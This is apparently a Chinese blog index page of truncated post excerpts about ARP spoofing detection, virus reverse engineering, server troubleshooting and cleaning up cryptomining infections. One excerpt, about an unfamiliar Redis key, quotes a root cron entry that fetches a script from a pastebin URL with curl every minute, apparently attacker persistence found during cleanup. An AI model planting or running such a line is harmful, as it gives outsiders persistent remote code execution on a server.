Xarp工具（高级ARP欺骗检测工具）。 = 。=之前做实验发现的一个工具，自己感觉用起来还不错。突然 ...

ARP： 我们知道，网络层和网络层以上使用的是IP地址，但在实际网络的链路上传送数据帧时，数据包首先是被网卡接受到再去处理上层协议的，所以最终还是必须使用该网络的硬件地址。但IP地址和下面的网络的硬件地址之间由于格式不同而不存在简单的映射关系 ...

0x00 前言 这个病毒应该是比较简单的，别人给我的样本，让我帮忙看看，看样子是很早的一个病毒，针对Windows XP系统的，行为分析很简单，但是想着不能就仅仅分析关键点，要不就把整个结构给逆向出来，弄了两天，搞的差不多了，简单的记录一下。 0x01 基本介绍 整个病毒是4个文件组成 ...

1. 问题描述：早上刚来上班，业务部门同事反应管理后台无法登录 2. 问题排查定位 2.1 服务器排查 a. 接口是否可以调通：首先自己登陆后台，发现时好时坏，偶尔接口返回【系统忙】。我们系统接口异常调不通会返回系统忙 b. 服务是否死掉或者假死：连接服务器->查看Java ...

一、场景： 系统 Deepin 15；php 5.5.33；nginx 1.9.9 二、状况： 简单的页面输出正常（比如 phpinfo();），跑公司的任何一个项目，均502 三、排查 1、查询各种日志，包括 nginx.error.log、php_error.log ...

起因 偶然间发现redis里有一个陌生key：tightsoft，它的值是：*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb ...

概述： 9.4号临时接到通知让一个人去应急，第一次应急，比较虚，到客户那里了解了一下情况。主要现象是流量异常，CPU占用过高。 发现连接数超多-17779，然后在试图连接其他主机的22端口 发现异常进程，当初进行杀死之后，从九点到晚上十点cpu都是正常的，然后上午通过查看日志last ...

背景 新接手了个环境，同事交接时说这些机器中过挖矿病毒还没重装，我TM。。。 线上环境不好动，只能手动查杀了。 操作系统如下： 过程 ssh上去，ps -ef看到如下： 手动kill掉进程，很快会生成新的，猜测有守护进程。用STOP信号让它停止。 查看定时任务清理 ...